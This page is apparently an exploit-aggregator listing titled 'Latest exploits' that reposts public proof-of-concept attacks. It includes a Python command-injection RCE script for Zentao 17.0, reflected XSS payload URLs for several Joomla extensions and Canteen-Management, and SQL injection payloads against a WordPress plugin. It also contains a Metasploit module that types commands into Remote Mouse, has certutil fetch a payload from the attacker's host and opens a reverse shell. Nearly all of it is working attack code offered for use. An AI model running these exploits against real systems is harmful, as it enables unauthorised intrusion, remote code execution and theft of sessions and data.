Latest exploits :: CodePwn

<pre><code># Exploit Title: Zentao Project Management System 17.0 - Authenticated Remote Code Execution # Exploit Author: mister0xf # Date: 2022-10-8 # Software Link: https://github.com/easysoft/zentaopms # Version: tested on 17.0 (probably works also on newer/older versions) # Tested On: Kali Linux 2022.2 # Exploit Tested Using: Python 3.10.4 # Vulnerability Description: # Zentao Project Management System 17.0 suffers from an authenticated command injection allowing # remote attackers to obtain Remote Code Execution (RCE) on the hosting webserver # Vulnerable Source Code: # /module/repo/model.php: # [...] # $client = $this->post->client; // <-- client is taken from the POST request # [...] # elseif($scm == 'Git') # { # if(!is_dir($path)) # { # dao::$errors['path'] = sprintf($this->lang->repo->error->noFile, $path); # return false; # } # # if(!chdir($path)) # { # if(!is_executable($path)) # { # dao::$errors['path'] = sprintf($this->lang->repo->error->noPriv, $path); # return false; # } # dao::$errors['path'] = $this->lang->repo->error->path; # return false; # } # # $command = "$client tag 2>&1"; // <-- command is injected here # exec($command, $output, $result); import requests,sys import hashlib from urllib.parse import urlparse from bs4 import BeautifulSoup def banner(): print(''' ::::::::: :::::::::: :::: ::: :::::::: ::::::::::: ::: :::::::: :+: :+: :+:+: :+: :+: :+: :+: :+: :+: :+: :+: +:+ +:+ :+:+:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +#+ +#++:++# +#+ +:+ +#+ +#+ +#+ +#++:++#++: +#+ +:+ +#+ +#+ +#+ +#+#+# +#+ +#+ +#+ +#+ +#+ +#+ #+# #+# #+# #+#+# #+# #+# #+# #+# #+# #+# #+# ######### ########## ### #### ######## ########### ### ### ######## ''') def usage(): print('Usage: zenciao user password http://127.0.0.1/path') def main(): if ((len(sys.argv)-1) != 3): usage() banner() exit() #proxy = {'http':'http://127.0.0.1:8080'} banner() username = sys.argv[1] password = sys.argv[2] target = sys.argv[3] # initialize session object session = requests.session() home_url = target+'/index.php' rand_url = target+'/index.php?m=user&f=refreshRandom&t=html' login_url = target+'/index.php?m=user&f=login&t=html' create_repo_url = target+'/index.php?m=repo&f=create&objectID=0' r1 = session.get(home_url) soup = BeautifulSoup(r1.text, "html.parser") script_tag = soup.find('script') redirect_url = script_tag.string.split("'")[1] r2 = session.get(target+redirect_url) # get random value session.headers.update({'X-Requested-With': 'XMLHttpRequest'}) res = session.get(rand_url) rand = res.text # compute md5(md5(password)+rand) md5_pwd = hashlib.md5((hashlib.md5(password.encode()).hexdigest()+str(rand)).encode()) # login request post_data = {"account":username,"password":md5_pwd.hexdigest(),"passwordStrength":1,"referer":"/zentaopms/www/","verifyRand":rand,"keepLogin":0,"captcha":""} my_referer = target+'/zentaopms/www/index.php?m=user&f=login&t=html' session.headers.update({'Referer': my_referer}) session.headers.update({'X-Requested-With': 'XMLHttpRequest'}) response = session.post(login_url, data=post_data) # exploit rce # devops repo page r2 = session.get(create_repo_url) git_test_dir = '/home/' command = 'whoami;' exploit_post_data = {"SCM":"Git","name":"","path":git_test_dir,"encoding":"utf-8","client":command,"account":"","password":"","encrypt":"base64","desc":""} r3 = session.post(create_repo_url, data=exploit_post_data) print(r3.content) if __name__ == '__main__': main() </code></pre>

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Exploits ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : extensions.joomla.org │ │ Vendor : e4j Extensions for Joomla - extensionsforjoomla.com │ │ Software : Joomla Vik Booking 1.15.0 │ │ Vuln Type: Reflected XSS │ │ Method : GET │ │ Impact : Manipulate the content of the site │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ B4nks-NET irc.b4nks.tk #unix ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ The attacker can send to victim a link containing a malicious URL in an email or │ │ instant message can perform a wide variety of actions, such as stealing the victim's │ │ session token or login credentials │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL CryptoJob (Twitter) twitter.com/CryptozJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2022 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Path: /index.php/en/booking GET parameter 'categories' is vulnerable to XSS https://extensionsforjoomla.com/livedemo/vikbooking/index.php/en/booking?option=com_vikbooking&task=showprc&roomsnum=1&roomopt%5B%5D=9&adults%5B%5D=2&children%5B%5D=1&days=1&checkin=1665057600&checkout=1665136800&category_id=&categories=rnrtm%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ew3vus&Itemid=103 [-] Done </code></pre>

<pre><code># Exploit Title: Wordpress Plugin Zephyr Project Manager 3.2.42 - Multiple SQLi # Date: 14-08-2022 # Exploit Author: Rizacan Tufan # Blog Post: https://rizax.blog/blog/wordpress-plugin-zephyr-project-manager-multiple-sqli-authenticated # Software Link: https://wordpress.org/plugins/zephyr-project-manager/ # Vendor Homepage: https://zephyr-one.com/ # Version: 3.2.42 # Tested on: Windows, Linux # CVE : CVE-2022-2840 (https://wpscan.com/vulnerability/13d8be88-c3b7-4d6e-9792-c98b801ba53c) # Description Zephyr Project Manager is a plug-in that helps you manage and get things done effectively, all your projects and tasks. It has been determined that the data coming from the input field in most places throughout the application are used in=20 the query without any sanitize and validation. The details of the discovery are given below. # Proof of Concept (PoC)=20 The details of the various SQL Injection on the application are given below. ## Endpoint of Get Project Data. Sample Request :=20 POST /wp-admin/admin-ajax.php HTTP/2 Host: vuln.local Cookie: ... ... Referer: https://vuln.local/wp-admin/admin.php?page=3Dzephyr_project_manager_projects Content-Type: application/x-www-form-urlencoded; charset=3DUTF-8 X-Requested-With: XMLHttpRequest Content-Length: 74 Origin: https://vuln.local Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers action=3Dzpm_view_project&project_id=3D1&zpm_nonce=3D22858bf3a7 Payload :=20 --- Parameter: project_id (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: action=3Dzpm_view_project&project_id=3D1 AND 4923=3D4923&zpm_nonce=3D22858bf3a7 Type: time-based blind Title: MySQL >=3D 5.0.12 OR time-based blind (query SLEEP) Payload: action=3Dzpm_view_project&project_id=3D1 OR (SELECT 7464 FROM (SELECT(SLEEP(20)))EtZW)&zpm_nonce=3D22858bf3a7 Type: UNION query Title: Generic UNION query (NULL) - 20 columns Payload: action=3Dzpm_view_project&project_id=3D-4909 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71707a7071,0x6264514e6e4944795a6f6e4a786a6e4d4f666255434d6a5553526e43616e52576c75774743434f67,0x71786b6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&zpm_nonce=3D22858bf3a7 --- ## Endpoint of Get Task Data. Sample Request :=20 POST /wp-admin/admin-ajax.php HTTP/2 Host: vuln.local Cookie: ... ... Referer: https://vuln.local/wp-admin/admin.php?page=3Dzephyr_project_manager_tasks Content-Type: application/x-www-form-urlencoded; charset=3DUTF-8 X-Requested-With: XMLHttpRequest Content-Length: 51 Origin: https://vuln.local Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers task_id=3D1&action=3Dzpm_view_task&zpm_nonce=3D22858bf3a7 Payload :=20 --- Parameter: task_id (POST) Type: time-based blind Title: MySQL >=3D 5.0.12 AND time-based blind (query SLEEP) Payload: task_id=3D1 AND (SELECT 5365 FROM (SELECT(SLEEP(20)))AdIX)&action=3Dzpm_view_task&zpm_nonce=3D22858bf3a7 --- ## Endpoint of New Task. Sample Request :=20 POST /wp-admin/admin-ajax.php HTTP/2 Host: vuln.local Cookie: ... ... Referer: https://vuln.local/wp-admin/admin.php?page=3Dzephyr_project_manager_tasks Content-Type: application/x-www-form-urlencoded; charset=3DUTF-8 X-Requested-With: XMLHttpRequest Content-Length: 337 Origin: https://vuln.local Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers task_name=3Dtest&task_description=3Dtest&task_project=3D1&task_due_date=3D&task_start_date=3D&team=3D0&priority=3Dpriority_none&status=3Dtest&type=3Ddefault&recurrence%5Btype%5D=3Ddefault&parent-id=3D-1&action=3Dzpm_new_task&zpm_nonce=3D22858bf3a7 Payload :=20 --- Parameter: task_project (POST) Type: time-based blind Title: MySQL >=3D 5.0.12 AND time-based blind (query SLEEP) Payload: task_name=3Dtest&task_description=3Dtest&task_project=3D1 AND (SELECT 3078 FROM (SELECT(SLEEP(20)))VQSp)&task_due_date=3D&task_start_date=3D&team=3D0&priority=3Dpriority_none&status=3Drrrr-declare-q-varchar-99-set-q-727aho78zk9gcoyi8asqud6osfy9m0io9hx9kz8o-oasti-fy-com-tny-exec-master-dbo-xp-dirtree-q&type=3Ddefault&recurrence[type]=3Ddefault&parent-id=3D-1&action=3Dzpm_new_task&zpm_nonce=3D22858bf3a7 --- </code></pre>

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Exploits ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : extensions.joomla.org │ │ Vendor : Heiner Klostermann - kiss-software.de │ │ Software : Joomla KSAdvertiser 2.5.37 │ │ Vuln Type: Reflected XSS │ │ Method : GET │ │ Impact : Manipulate the content of the site │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ B4nks-NET irc.b4nks.tk #unix ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ The attacker can send to victim a link containing a malicious URL in an email or │ │ instant message can perform a wide variety of actions, such as stealing the victim's │ │ session token or login credentials │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL CryptoJob (Twitter) twitter.com/CryptozJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2022 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Path: /index.php GET parameter 'fSpS' is vulnerable to XSS https://www.kiss-software.de/index.php?option=com_ksadvertiser&view=items&Itemid=0&filtercat=50&fSpS=KGNjLmlkID0gNTAgT1IgY2MucGFyZW50X2lkID0gNTApfChhLml0X2lkZW50PScxJyBPUiBhLml0X3Bob25ldGljIExJS0UgJyUxJScpfChhLnRpdGxlPScyJyBPUiBhLml0X3Bob25ldGljIExJS0UgJyUyJScpfChhLml0X2ludHJvPSczJyBPUiBhLml0X3Bob25ldGljIExJS0UgJyUzJScpfCgoYS5pdF9hZGRyZXNzPSc0JyBPUiBhLml0X3Bob25ldGljIExJS0UgJyU0JScpIEFORCBhLml0X2JveG51bWJlciA9IDApfCgoYS5pdF9wb3N0Y29kZT0nNScgT1IgYS5pdF9waG9uZXRpYyBMSUtFICclNSUnKSBBTkQgYS5pdF9ib3hudW1iZXIgPSAwKXwoKGEuaXRfY2l0eT0nNicgT1IgYS5pdF9waG9uZXRpYyBMSUtFICclNiUnKSBBTkQgYS5pdF9ib3hudW1iZXIgPSAwKWg1bjZsPHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0PmlyYzdu&lang=en [-] Done </code></pre>

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Exploits ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : extensions.joomla.org │ │ Vendor : Joomla JoomBri Careers 3.3.0 │ │ Software : JoomBri Team │ │ Vuln Type: Reflected XSS │ │ Method : GET │ │ Impact : Manipulate the content of the site │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ B4nks-NET irc.b4nks.tk #unix ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ The attacker can send to victim a link containing a malicious URL in an email or │ │ instant message can perform a wide variety of actions, such as stealing the victim's │ │ session token or login credentials │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL CryptoJob (Twitter) twitter.com/CryptozJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2022 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Path: /for-jobseekers/search-jobs GET parameter 'keyword' is vulnerable to XSS https://target.com/for-jobseekers/search-jobs?keyword=l9x1q%22onfocus%3d%22alert(1)%22autofocus%3d%22ak5aghi5u9p&location_id=2&jobtype_id=1&industry_id%5B%5D=2&functional_id%5B%5D=2&education_id%5B%5D=2&limit=20&option=com_career&task= [-] Done </code></pre>

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Exploits ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : extensions.joomla.org │ │ Vendor : Joomla JoomBri Freelance 4.5.0 │ │ Software : JoomBri Team │ │ Vuln Type: Reflected XSS │ │ Method : GET │ │ Impact : Manipulate the content of the site │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ B4nks-NET irc.b4nks.tk #unix ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ The attacker can send to victim a link containing a malicious URL in an email or │ │ instant message can perform a wide variety of actions, such as stealing the victim's │ │ session token or login credentials │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL CryptoJob (Twitter) twitter.com/CryptozJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2022 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Path: /index.php GET parameter 'keyword' is vulnerable to XSS https://target.com/index.php?keyword=xfz9b%22onfocus%3d%22alert(1)%22autofocus%3d%22nyn0r [-] Done </code></pre>

<pre><code>## Title: Canteen-Management-1.0-2022 suffers from XSS-Reflected ## Author: nu11secur1ty ## Date: 10.04.2022 ## Vendor: https://www.mayurik.com/ ## Software: https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/mayuri_k/2022/Canteen-Management/Docs/youthappam.zip?raw=true ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management ## Description: The Canteen-Management-1.0-2022 suffers from XSS-Reflected vulnerability. The name of an arbitrarily supplied URL parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The attacker can craft a very malicious HTTPS URL redirecting to a very malicious URL. When the victim clicks into this crafted URL the game will over for him. STATUS: High vulnerability [+]Payload REQUEST: ```HTML GET /youthappam/login.php/lu555%22%3E%3Ca%20href=%22https://pornhub.com/%22%20target=%22_blank%22%20rel=%22noopener%20nofollow%20ugc%22%3E%20%3Cimg%20src=%22https://raw.githubusercontent.com/nu11secur1ty/XSSight/master/nu11secur1ty/images/IMG_0068.gif?token=GHSAT0AAAAAABXWGSKOH7MBFLEKF4M6Y3YCYYKADTQ&rs=1%22%20style=%22border:1px%20solid%20black;max-width:100%;%22%20alt=%22Photo%20of%20Byron%20Bay,%20one%20of%20Australia%27s%20best%20beaches!%22%3E%20%3C/a%3Emv2me HTTP/1.1 Host: pwnedhost.com Accept-Encoding: gzip, deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36 Connection: close Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="106", "Chromium";v="106" Sec-CH-UA-Platform: Windows Sec-CH-UA-Mobile: ?0 ``` [+]Payload RESPONSE: ```burp HTTP/1.1 200 OK Date: Tue, 04 Oct 2022 09:44:55 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6 X-Powered-By: PHP/8.1.6 Set-Cookie: PHPSESSID=m1teao9b0j86ep94m6v7ek7fe6; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 6140 Connection: close Content-Type: text/html; charset=UTF-8 <link rel="stylesheet" href="assets/css/popup_style.css"> <style> .footer1 { position: fixed; bottom: 0; width: 100%; color: #5c4ac7; text-align: center; } </style> <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=0, minimal-ui"> <meta http-equiv="X-UA-Compatible" content="IE=edge" /> <meta name="description" content=""> <meta name="keywords" content=""> <meta name="author" content=""> <link rel="icon" type="image/png" sizes="16x16" href="assets/uploadImage/Logo/favicon.png"> <style type="text/css"> @media print { #printbtn { display : none; } } </style> <title>Youthappam Canteen Management System - by Mayuri K. Freelancer</title> <link href="assets/css/lib/chartist/chartist.min.css" rel="stylesheet"> <link href="assets/css/lib/owl.carousel.min.css" rel="stylesheet" /> <link href="assets/css/lib/owl.theme.default.min.css" rel="stylesheet" /> <link href="assets/css/lib/bootstrap/bootstrap.min.css" rel="stylesheet"> <link href="assets/css/helper.css" rel="stylesheet"> <link href="assets/css/style.css" rel="stylesheet"> <link rel="stylesheet" href="assets/css/lib/html5-editor/bootstrap-wysihtml5.css" /> <link href="assets/css/lib/calendar2/semantic.ui.min.css" rel="stylesheet"> <link href="assets/css/lib/calendar2/pignose.calendar.min.css" rel="stylesheet"> <link href="assets/css/lib/sweetalert/sweetalert.css" rel="stylesheet"> <link href="assets/css/lib/datepicker/bootstrap-datepicker3.min.css" rel="stylesheet"> <script type="text/javascript" src="https://www.gstatic.com/charts/loader.js"></script> <script type="text/javascript"> google.charts.load("current", {packages:["corechart"]}); google.charts.setOnLoadCallback(drawChart); function drawChart() { var data = google.visualization.arrayToDataTable([ ['Food', 'Average sale per Day'], ['Masala dosa', 11], ['Chicken 65 ', 2], ['Karapu Boondi', 2], ['Bellam Gavvalu', 2], ['Gummadikaya Vadiyalu', 7] ]); var options = { title: 'Food Average Sale per Day', pieHole: 0.4, }; var chart = new google.visualization.PieChart(document.getElementById('donutchart')); chart.draw(data, options); } </script> </head> <body class="fix-header fix-sidebar"> <div id="page"></div> <div id="loading"></div> <div id="main-wrapper"> <div class="unix-login"> <div class="container-fluid" style="background-image: url('assets/myimages/background.jpg'); background-color: #ffffff;background-size:cover"> <div class="row"> <div class="col-lg-4 ml-auto"> <div class="login-content"> <div class="login-form"> <center><img src="./assets/uploadImage/Logo/logo.png" style="width: 100%;"></center> <form action="/youthappam/login.php/lu555"><a href="https:/pornhub.com/" target="_blank" rel="noopener nofollow ugc"> <img src="https:/raw.githubusercontent.com/nu11secur1ty/XSSight/master/nu11secur1ty/images/IMG_0068.gif" method="post" id="loginForm"> <div class="form-group"> <input type="text" name="username" id="username" class="form-control" placeholder="Username" required=""> </div> <div class="form-group"> <input type="password" id="password" name="password" class="form-control" placeholder="Password" required=""> </div> <button type="submit" name="login" class="f-w-600 btn btn-primary btn-flat m-b-30 m-t-30">Sign in</button>  <div class="forgot-phone text-left f-left"> <a href = "mailto:mayuri.infospace@gmail.com?subject = Project Development Requirement&body = I saw your projects. I want to develop a project" class="text-right f-w-600"> Click here to contact me</a> </div> </form> </div> </div> </div> </div> </div> </div> </div> <script src="./assets/js/lib/jquery/jquery.min.js"></script> <script src="./assets/js/lib/bootstrap/js/popper.min.js"></script> <script src="./assets/js/lib/bootstrap/js/bootstrap.min.js"></script> <script src="./assets/js/jquery.slimscroll.js"></script> <script src="./assets/js/sidebarmenu.js"></script> <script src="./assets/js/lib/sticky-kit-master/dist/sticky-kit.min.js"></script> <script src="./assets/js/custom.min.js"></script> <script> function onReady(callback) { var intervalID = window.setInterval(checkReady, 1000); function checkReady() { if (document.getElementsByTagName('body')[0] !== undefined) { window.clearInterval(intervalID); callback.call(this); } } } function show(id, value) { document.getElementById(id).style.display = value ? 'block' : 'none'; } onReady(function () { show('page', true); show('loading', false); }); </script> </body> </html> ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/edit/main/vendors/mayuri_k/2022/Canteen-Management) ## Proof and Exploit: [href](https://streamable.com/emg0zo) ## More: [href](https://www.nu11secur1ty.com/) Done: На вт, 4.10.2022 г. в 23:24 ч. nu11 secur1ty <nu11secur1typentest@gmail.com> написа: > Tomorow I will send to you. BR > > On Tue, Oct 4, 2022, 19:11 Packet Storm <packet@packetstormsecurity.com> > wrote: > >> Missing submission >> >> On Tue, Oct 04, 2022 at 02:23:16PM +0300, nu11 secur1ty wrote: >> > >> https://www.nu11secur1ty.com/2022/10/example-of-professional-penetration.html >> > >> https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management >> > -- >> > System Administrator - Infrastructure Engineer >> > Penetration Testing Engineer >> > Exploit developer at https://packetstormsecurity.com/ >> > https://cve.mitre.org/index.html and https://www.exploit-db.com/ >> > home page: https://www.nu11secur1ty.com/ >> > hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= >> > nu11secur1ty <http://nu11secur1ty.com/> >> > -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/> </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Exploit::Remote::Tcp include Exploit::EXE # generate_payload_exe include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::FileDropper prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Remote Mouse RCE', 'Description' => %q{ This module utilizes the Remote Mouse Server by Emote Interactive protocol to deploy a payload and run it from the server. This module will only deploy a payload if the server is set without a password (default). Tested against 4.110, current at the time of module writing }, 'License' => MSF_LICENSE, 'Author' => [ 'h00die', # msf module '0RPHON', # discovery, edb module 'H4rk3nz0' # poc2 ], 'References' => [ [ 'EDB', '46697' ], [ 'CVE', '2022-3365' ], [ 'URL', 'https://www.remotemouse.net/' ], [ 'URL', 'https://github.com/H4rk3nz0/PenTesting/blob/main/Exploits/remote%20mouse/remote-mouse-rce.py' ] ], 'Arch' => [ ARCH_X64, ARCH_X86 ], 'Platform' => 'win', 'Stance' => Msf::Exploit::Stance::Aggressive, 'Targets' => [ ['default', {}], ], 'DefaultOptions' => { 'PAYLOAD' => 'windows/shell/reverse_tcp' }, 'DisclosureDate' => '2019-04-15', 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [ARTIFACTS_ON_DISK, SCREEN_EFFECTS] # typing on screen } ) ) register_options( [ OptPort.new('RPORT', [true, 'Port Remote Mouse runs on', 1978]), OptInt.new('SLEEP', [true, 'How long to sleep between commands', 1]), OptString.new('PATH', [true, 'Where to stage payload for pull method', 'c:\\Windows\\Temp\\']) ] ) end def path return datastore['PATH'] if datastore['PATH'].end_with? '\\' "#{datastore['PATH']}\\" end def key_value(key) characters = { 'A' => '8[ras]116', 'B' => '8[ras]119', 'C' => '8[ras]118', 'D' => '8[ras]113', 'E' => '8[ras]112', 'F' => '8[ras]115', 'G' => '8[ras]114', 'H' => '8[ras]125', 'I' => '8[ras]124', 'J' => '8[ras]127', 'K' => '8[ras]126', 'L' => '8[ras]121', 'M' => '8[ras]120', 'N' => '8[ras]123', 'O' => '8[ras]122', 'P' => '8[ras]101', 'Q' => '8[ras]100', 'R' => '8[ras]103', 'S' => '8[ras]102', 'T' => '7[ras]97', 'U' => '7[ras]96', 'V' => '7[ras]99', 'W' => '7[ras]98', 'X' => '8[ras]109', 'Y' => '8[ras]108', 'Z' => '8[ras]111', 'a' => '7[ras]84', 'b' => '7[ras]87', 'c' => '7[ras]86', 'd' => '7[ras]81', 'e' => '7[ras]80', 'f' => '7[ras]83', 'g' => '7[ras]82', 'h' => '7[ras]93', 'i' => '7[ras]92', 'j' => '7[ras]95', 'k' => '7[ras]94', 'l' => '7[ras]89', 'm' => '7[ras]88', 'n' => '7[ras]91', 'o' => '7[ras]90', 'p' => '7[ras]69', 'q' => '7[ras]68', 'r' => '7[ras]71', 's' => '7[ras]70', 't' => '7[ras]65', 'u' => '7[ras]64', 'v' => '7[ras]67', 'w' => '7[ras]66', 'x' => '7[ras]77', 'y' => '7[ras]76', 'z' => '7[ras]79', '1' => '6[ras]4', '2' => '6[ras]7', '3' => '6[ras]6', '4' => '6[ras]1', '5' => '6[ras]0', '6' => '6[ras]3', '7' => '6[ras]2', '8' => '7[ras]13', '9' => '7[ras]12', '0' => '6[ras]5', "\n" => '3RTN', "\b" => '3BAS', ' ' => '7[ras]21', '+' => '7[ras]30', '=' => '6[ras]8', '/' => '7[ras]26', '_' => '8[ras]106', '<' => '6[ras]9', '>' => '7[ras]11', '[' => '8[ras]110', ']' => '8[ras]104', '!' => '7[ras]20', '@' => '8[ras]117', '#' => '7[ras]22', '$' => '7[ras]17', '%' => '7[ras]16', '^' => '8[ras]107', '&' => '7[ras]19', '*' => '7[ras]31', '(' => '7[ras]29', ')' => '7[ras]28', '-' => '7[ras]24', "'" => '7[ras]18', '"' => '7[ras]23', ':' => '7[ras]15', ';' => '7[ras]14', '?' => '7[ras]10', '`' => '7[ras]85', '~' => '7[ras]75', '\\' => '8[ras]105', '|' => '7[ras]73', '{' => '7[ras]78', '}' => '7[ras]72', ',' => '7[ras]25', '.' => '7[ras]27' } "key #{characters[key]}" end def windows_key 'key 3cmd' end def check connect response = sock.get_once disconnect if response.include?('SIN 15win nop nop') splits = response.split(' ') return CheckCode::Appears("Received handshake with version: #{splits.last}") end CheckCode::Unknown('Invalid response from target') end def send_command(command) if command == windows_key sock.put(command) elsif (command == "\n") || (command == "\b") # dont split this up sock.put(key_value(c)) else command.each_char do |c| sock.put(key_value(c)) end sock.put(key_value("\n")) end sleep(datastore['SLEEP']) end def on_request_uri(cli, _req) p = generate_payload_exe send_response(cli, p) print_good("Payload request received, sending #{p.length} bytes of payload for staging") end def exploit connect print_status('Connecting') print_status('Sending Windows key') send_command(windows_key) print_status('Opening command prompt') send_command('cmd.exe') send_command('') # https://github.com/rapid7/metasploit-framework/pull/17067#discussion_r982670440 print_status('Sending stager') filename = Rex::Text.rand_text_alphanumeric(rand(8..17)) + '.exe' register_file_for_cleanup("#{path}#{filename}") # I attempted to put this all in one, stage, run, exit, but it was never successful, so we'll keep it in 2 stager = "certutil.exe -urlcache -f http://#{datastore['lhost']}:#{datastore['SRVPORT']}/ #{path}#{filename}" start_service('Path' => '/') # start webserver send_command(stager) send_command('') # https://github.com/rapid7/metasploit-framework/pull/17067#discussion_r982670440 print_status('Executing payload') send_command("#{path}#{filename} && exit") send_command('') # https://github.com/rapid7/metasploit-framework/pull/17067#discussion_r982670440 handler disconnect sleep(datastore['SLEEP'] * 2) # give time for it to do its thing before we revert end end </code></pre>

